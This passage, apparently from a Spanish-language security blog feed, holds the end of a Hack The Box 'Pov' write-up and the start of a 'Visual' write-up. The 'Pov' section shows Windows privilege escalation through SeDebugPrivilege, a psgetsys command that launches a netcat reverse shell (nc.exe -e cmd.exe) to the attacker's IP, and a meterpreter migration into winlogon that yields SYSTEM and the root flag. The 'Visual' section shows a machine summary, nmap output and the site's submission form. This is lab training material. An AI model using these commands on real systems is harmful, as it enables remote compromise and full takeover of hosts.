</span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ rlwrap nc -lvp <span class="m">1335</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1335</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.151<span class="o">]</span> from pov.htb <span class="o">[</span>10.10.11.251<span class="o">]</span> <span class="m">49701</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.5329<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami /priv </span></span><span class="line"><span class="cl">whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl">SeDebugPrivilege Debug programs Disabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Disabled </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;cd c:/users/alaading/documents </span></span><span class="line"><span class="cl">c:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt;dir </span></span><span class="line"><span class="cl"> Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is 0899-6CAF </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of c:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">03/12/2024 07:40 PM &lt;DIR&gt; . </span></span><span class="line"><span class="cl">03/12/2024 07:40 PM &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">03/12/2024 07:38 PM 5,926 psgetsys.ps1 </span></span><span class="line"><span class="cl">03/12/2024 07:38 PM 2,387 Set-TokenPrivilege.ps1 </span></span><span class="line"><span class="cl"> <span class="m">4</span> File<span class="o">(</span>s<span class="o">)</span> 85,560 bytes </span></span><span class="line"><span class="cl"> <span class="m">2</span> Dir<span class="o">(</span>s<span class="o">)</span> 7,208,996,864 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">c:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt;powershell </span></span><span class="line"><span class="cl">Windows PowerShell </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; . .<span class="se">\S</span>et-TokenPrivilege.ps1 </span></span><span class="line"><span class="cl"><span class="m">4856</span> </span></span><span class="line"><span class="cl"><span class="m">4856</span> </span></span><span class="line"><span class="cl">True </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; whoami /priv </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl">SeDebugPrivilege Debug programs Enabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Disabled </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Por alguna razon <code>psgetsys.ps1</code> no funciono, por lo que realizar el attach al proceso winlogon no es posible.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; import-module .<span class="se">\p</span>sgetsys.ps1<span class="p">;</span> ImpersonateFromParentPid -ppid <span class="m">556</span> -command <span class="s2">&#34;c:\windows\system32\cmd.exe&#34;</span> -cmdargs <span class="s2">&#34;/c \\10.10.14.151\share\nc.exe 10.10.14.151 4444 -e cmd.exe&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Got Handle <span class="k">for</span> ppid: <span class="m">556</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Updated proc attribute list </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Starting c:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\c</span>md.exe /c <span class="se">\\</span>10.10.14.151<span class="se">\s</span>hare<span class="se">\n</span>c.exe 10.10.14.151 <span class="m">4444</span> -e cmd.exe...True - pid: <span class="m">3656</span> - Last error: <span class="m">122</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Ante esto creamos y ejecutamos una shell de meterpreter con el token habilitado.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msf6 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; sessions -i <span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting interaction with 2... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">meterpreter &gt; getprivs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Enabled Process <span class="nv">Privileges</span> </span></span><span class="line"><span class="cl"><span class="o">==========================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Name </span></span><span class="line"><span class="cl">---- </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege </span></span><span class="line"><span class="cl">SeDebugPrivilege </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">meterpreter &gt; </span></span></code></pre></td></tr></table> </div> </div><p>Verificamos el PID del proceso winlogon y ejecutamos una migracion a este proceso. <code>migrate</code> seria el reemplazo de psgetsys.ps1.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">meterpreter &gt; ps </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Process <span class="nv">List</span> </span></span><span class="line"><span class="cl"><span class="o">============</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> PID PPID Name Arch Session User Path </span></span><span class="line"><span class="cl"> --- ---- ---- ---- ------- ---- ---- </span></span><span class="line"><span class="cl"> <span class="m">0</span> <span class="m">0</span> <span class="o">[</span>System Process<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="m">4</span> <span class="m">0</span> System x64 <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="m">88</span> <span class="m">4</span> Registry x64 <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="m">296</span> <span class="m">4</span> smss.exe x64 <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="m">332</span> <span class="m">624</span> svchost.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>vchost.exe </span></span><span class="line"><span class="cl"> <span class="m">380</span> <span class="m">624</span> svchost.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>vchost.exe </span></span><span class="line"><span class="cl"> <span class="m">384</span> <span class="m">376</span> csrss.exe x64 <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="m">392</span> <span class="m">5104</span> cmd.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\c</span>md.exe </span></span><span class="line"><span class="cl"> <span class="m">408</span> <span class="m">624</span> svchost.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>vchost.exe </span></span><span class="line"><span class="cl"> <span class="m">488</span> <span class="m">376</span> wininit.exe x64 <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="m">496</span> <span class="m">480</span> csrss.exe x64 <span class="m">1</span> </span></span><span class="line"><span class="cl"> <span class="m">556</span> <span class="m">480</span> winlogon.exe x64 <span class="m">1</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\w</span>inlogon.exe </span></span><span class="line"><span class="cl"> <span class="m">624</span> <span class="m">488</span> services.exe x64 <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="m">644</span> <span class="m">488</span> lsass.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\l</span>sass.exe </span></span><span class="line"><span class="cl"> <span class="m">756</span> <span class="m">624</span> svchost.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>vchost.exe </span></span><span class="line"><span class="cl"> <span class="o">[</span>...<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="m">4636</span> <span class="m">624</span> svchost.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>vchost.exe </span></span><span class="line"><span class="cl"> <span class="m">4724</span> <span class="m">392</span> powershell.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span>1.0<span class="se">\p</span>owershell.exe </span></span><span class="line"><span class="cl"> <span class="m">4772</span> <span class="m">2312</span> shell.exe x86 <span class="m">0</span> POV<span class="se">\a</span>laading C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments<span class="se">\s</span>hell.exe </span></span><span class="line"><span class="cl"> <span class="m">4936</span> <span class="m">392</span> conhost.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\c</span>onhost.exe </span></span><span class="line"><span class="cl"> <span class="m">4992</span> <span class="m">624</span> svchost.exe x64 <span class="m">0</span> C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>vchost.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">meterpreter &gt; migrate <span class="m">556</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Migrating from <span class="m">4772</span> to 556... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Migration completed successfully. </span></span><span class="line"><span class="cl">meterpreter &gt; </span></span></code></pre></td></tr></table> </div> </div><p>Tras ello observamos que tenemos una larga lisa de tokens y al ejecutar una shell observamos que tenemos acceso como system.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">meterpreter &gt; getprivs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Enabled Process <span class="nv">Privileges</span> </span></span><span class="line"><span class="cl"><span class="o">==========================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Name </span></span><span class="line"><span class="cl">---- </span></span><span class="line"><span class="cl">SeAssignPrimaryTokenPrivilege </span></span><span class="line"><span class="cl">SeAuditPrivilege </span></span><span class="line"><span class="cl">SeBackupPrivilege </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege </span></span><span class="line"><span class="cl">SeCreateGlobalPrivilege </span></span><span class="line"><span class="cl">SeCreatePermanentPrivilege </span></span><span class="line"><span class="cl">SeDebugPrivilege </span></span><span class="line"><span class="cl">SeImpersonatePrivilege </span></span><span class="line"><span class="cl">SeIncreaseBasePriorityPrivilege </span></span><span class="line"><span class="cl">SeIncreaseQuotaPrivilege </span></span><span class="line"><span class="cl">SeLoadDriverPrivilege </span></span><span class="line"><span class="cl">SeManageVolumePrivilege </span></span><span class="line"><span class="cl">SeProfileSingleProcessPrivilege </span></span><span class="line"><span class="cl">SeRestorePrivilege </span></span><span class="line"><span class="cl">SeSecurityPrivilege </span></span><span class="line"><span class="cl">SeShutdownPrivilege </span></span><span class="line"><span class="cl">SeSystemEnvironmentPrivilege </span></span><span class="line"><span class="cl">SeTakeOwnershipPrivilege </span></span><span class="line"><span class="cl">SeTcbPrivilege </span></span><span class="line"><span class="cl">SeTrustedCredManAccessPrivilege </span></span><span class="line"><span class="cl">SeUndockPrivilege </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">meterpreter &gt; shell </span></span><span class="line"><span class="cl">Process <span class="m">4836</span> created. </span></span><span class="line"><span class="cl">Channel <span class="m">1</span> created. </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.5329<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;cd c:/users/administrator/desktop </span></span><span class="line"><span class="cl"><span class="nb">cd</span> c:/users/administrator/desktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">c:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;dir </span></span><span class="line"><span class="cl">dir </span></span><span class="line"><span class="cl"> Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is 0899-6CAF </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of c:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">01/15/2024 05:11 AM &lt;DIR&gt; . </span></span><span class="line"><span class="cl">01/15/2024 05:11 AM &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">03/12/2024 07:14 PM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> <span class="m">1</span> File<span class="o">(</span>s<span class="o">)</span> <span class="m">34</span> bytes </span></span><span class="line"><span class="cl"> <span class="m">2</span> Dir<span class="o">(</span>s<span class="o">)</span> 7,201,693,696 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">c:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;type root.txt </span></span><span class="line"><span class="cl"><span class="nb">type</span> root.txt </span></span><span class="line"><span class="cl">dd0d431ca4ed2f9cb5dfbae0bbdaac60 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">c:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; </span></span></code></pre></td></tr></table> </div> </div>]]> sckull featured image meta image path-traversal c# PSCredential Invoke-Command Deserialization ysoserial.net SeDebugPrivilege chisel WinRM psgetsys RunasCS meterpreter hackthebox windows Hack The Box - Visual https://sckull.github.io/posts/visual/ Sat, 24 Feb 2024 00:00:00 +0000 Sat, 24 Feb 2024 00:00:00 +0000 https://sckull.github.io/posts/visual/ <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/visual/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>Visual compila un proyecto de Visual Studio segun el repositorio dado, utilizamos custom build events dentro de un proyecto para ejecutar una shell. Dentro, ejecutamos una shell en Xampp lo que nos dio acceso como Local Service, obtuvimos de vuelta el privilegio SeImpersonate para luego acceder como System por medio de SharpEfsPotato.</p> <![CDATA[ <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/visual/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>Visual compila un proyecto de Visual Studio segun el repositorio dado, utilizamos custom build events dentro de un proyecto para ejecutar una shell. Dentro, ejecutamos una shell en Xampp lo que nos dio acceso como Local Service, obtuvimos de vuelta el privilegio SeImpersonate para luego acceder como System por medio de SharpEfsPotato.</p> <table> <thead> <tr> <th>Nombre</th> <th style="text-align: center"><a href="https://www.hackthebox.eu/home/machines/profile/568">Visual</a> <img src="#ZgotmplZ" alt="box_img_maker"></th> </tr> </thead> <tbody> <tr> <td><strong>OS</strong></td> <td style="text-align: center"><span><p class="os_type"> Windows <img src="https://sckull.github.io/images/icons/win.png" class="img_type_os"/></p></span></td> </tr> <tr> <td><strong>Puntos</strong></td> <td style="text-align: center">30</td> </tr> <tr> <td><strong>Dificultad</strong></td> <td style="text-align: center">Media</td> </tr> <tr> <td><strong>IP</strong></td> <td style="text-align: center">10.10.11.234</td> </tr> <tr> <td><strong>Maker</strong></td> <td style="text-align: center"><span><p class="user_maker"> <a href="https://www.hackthebox.eu/home/users/profile/256488">IsThisEnox</a><img src="https://www.hackthebox.eu/badge/image/256488" class="img_user_maker"/></p></span></td> </tr> <tr> <td> <a href="#" class="button" style="width: 72px; height: 30px; pointer-events: none;" data-color="default" target="_blank" rel="noreferrer"> <span class="button__text"> Matrix </span> </a></td> <td style="text-align: center"><div class="box"><pre tabindex="0"><code class="language-chart" data-lang="chart">{ &#34;type&#34;:&#34;radar&#34;, &#34;data&#34;:{ &#34;labels&#34;:[&#34;Enumeration&#34;,&#34;Real-Life&#34;,&#34;CVE&#34;,&#34;Custom Explotation&#34;,&#34;CTF-Like&#34;], &#34;datasets&#34;:[ { &#34;label&#34;:&#34;User Rate&#34;, &#34;data&#34;:[5.9, 6.5, 5.7, 4.3, 3.5], &#34;backgroundColor&#34;:&#34;rgba(75, 162, 189,0.5)&#34;, &#34;borderColor&#34;:&#34;#4ba2bd&#34; }, { &#34;label&#34;:&#34;Maker Rate&#34;, &#34;data&#34;:[5, 9, 7, 3, 1], &#34;backgroundColor&#34;:&#34;rgba(154, 204, 20,0.5)&#34;, &#34;borderColor&#34;:&#34;#9acc14&#34; } ] }, &#34;options&#34;: {&#34;scale&#34;: {&#34;ticks&#34;: {&#34;backdropColor&#34;:&#34;rgba(0,0,0,0)&#34;}, &#34;angleLines&#34;:{&#34;color&#34;:&#34;rgba(255, 255, 255,0.6)&#34;}, &#34;gridLines&#34;:{&#34;color&#34;:&#34;rgba(255, 255, 255,0.6)&#34;} } } } </code></pre></div></td> </tr> </tbody> </table> <h1 id="recon">Recon</h1> <h2 id="nmap">nmap</h2> <p><code>nmap</code> muestra unicamente el puerto http (80) abierto.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Nmap 7.94 scan initiated Mon Oct 23 16:40:18 2023 as: nmap -p80 -sV -sC -oN nmap_scan 10.10.11.234</span> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.234 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.064s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">80/tcp open http Apache httpd 2.4.56 <span class="o">((</span>Win64<span class="o">)</span> OpenSSL/1.1.1t PHP/8.1.17<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Visual - Revolutionizing Visual Studio Builds </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.56 <span class="o">(</span>Win64<span class="o">)</span> OpenSSL/1.1.1t PHP/8.1.17 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl"><span class="c1"># Nmap done at Mon Oct 23 16:40:31 2023 -- 1 IP address (1 host up) scanned in 12.15 seconds</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="web-site">Web Site</h2> <p>El sitio muestra un servidor apache y PHP 8.1.17.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual ❯ curl -sI http://10.10.11.234/ </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Date: Mon, <span class="m">30</span> Oct <span class="m">2023</span> 23:11:34 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.56 <span class="o">(</span>Win64<span class="o">)</span> OpenSSL/1.1.1t PHP/8.1.17 </span></span><span class="line"><span class="cl">X-Powered-By: PHP/8.1.17 </span></span><span class="line"><span class="cl">Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> π ~/htb/visual ❯ </span></span></code></pre></td></tr></table> </div> </div><p>La informacion del sitio indica que permite la compilacion de projectos de Visual Studio de un repositorio dado y que tiene soporte para .NET 6.0 y programas en C#.</p> <p><img src="https://sckull.github.io/images/posts/htb/visual/web_1.png" alt="image"></p> <p>Encontramos un formulario el cual espera una direccion URL y es enviado mediante el metodo post a /submit.php.</p> <p><img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_051525.png" alt="image"></p> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> formulario </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">form</span> <span class="na">action</span><span class="o">=</span><span class="s">&#34;/submit.php&#34;</span> <span class="na">method</span><span class="o">=</span><span class="s">&#34;POST&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">h2</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;h4 mb-4&#34;</span><span class="p">&gt;</span>Submit Your Repo<span class="p">&lt;/</span><span class="nt">h2</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;mb-3&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;url&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;gitRepoLink&#34;</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;form-control&#34;</span> <span class="na">placeholder</span><span class="o">=</span><span class="s">&#34;Enter Git Repo URL&#34;</span> <span class="na">required</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;submit&#34;</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;btn btn-primary&#34;</span><span class="p">&gt;</span>Submit<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;/</span><span class="nt">form</span><span class="p">&gt;</span> </span></span></code></pre></td></tr></table> </div> </div> </div> </div> <h2 id="directory-brute-forcing">Directory Brute Forcing</h2> <p><code>feroxbuster</code> muestra los recursos del sitio y las direcciones /uploads y /webalizer.</p> <div 